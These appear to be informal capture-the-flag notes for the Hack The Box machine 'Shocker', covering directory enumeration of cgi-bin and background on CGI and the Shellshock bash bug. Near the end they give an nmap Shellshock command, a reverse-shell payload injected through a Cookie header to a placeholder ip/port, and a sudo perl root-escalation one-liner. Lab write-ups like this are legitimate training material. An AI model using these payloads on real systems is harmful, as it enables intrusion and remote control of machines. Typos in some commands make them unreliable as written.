search

shocker

hashtag
Shocker shellshock

apache header tells ubuntu version ssh version tells ubuntu version

Based on the OpenSSH and Apache versions, the host is likely running Ubuntu 16.04. https://packages.ubuntu.com/search?keywords=openssh-serverarrow-up-right https://packages.ubuntu.com/search?keywords=apache2arrow-up-right

open in browser ; view page source gobuster does not reveals sesnitive dir because it does not dirb and dirsearch automatically addess a slash for directories in the wordlist but it doubles the no. of attempts . so dirb will find it in first go. if want to run gobuster add -f flag to look for directories i.e simply addessa a slash in wordlist

will get a cgi-bin directory

what is CGI ? let's configure our own cgi on apache server how to enable disable cgi for apache write your own cgi script configure cgi

Learning Apache http server - Executing CGI scripts - YouTube https://www.youtube.com/watch?v=aWWK5tqvuygarrow-up-right

Lecture -19 CGI Scripts - YouTube https://www.youtube.com/watch?v=cP1fN6xf3nIarrow-up-right

Common gateway interface|CGI bin - YouTube https://www.youtube.com/watch?v=rRnMLwj5GWkarrow-up-right

Common Gateway Interface(CGI) || working process of Common Gateway Interface - YouTube https://www.youtube.com/watch?v=cKckh5pD7VIarrow-up-right

Create first cgi script - YouTube https://www.youtube.com/watch?v=XBnGTXDu9gcarrow-up-right

How To Enable or Disable CGI Scripts in Apache - YouTube https://www.youtube.com/watch?v=Wr2IVt9X-zYarrow-up-right

run recurse inside this directory looking for command cgi scripts

it defines how info / comm takes place btwn browser n server

creating pages dynamically noyh

shellshock is a bug in bash old version of bash precisely https://www.youtube.com/watch?v=MyldPMn95kkarrow-up-right Shellshock Code & the Bash Bug - Computerphile

└─$ gobuster dir -o gobust-cgi.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.56/cgi-bin/arrow-up-right -x sh,pl,cgi

nmap -p80 --scipt http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=echo\;/bin/ls

reverse shell bash one liner rev shell cookie: () { :;}; echo; /bin/bash -i >&& /dev/tcp/ip/port 0>&1

priv esc sudo /usr/bin/perl -e 'exec("/bin/bash")'

PreviousLinuxNextOSPG

Last updated

Was this helpful?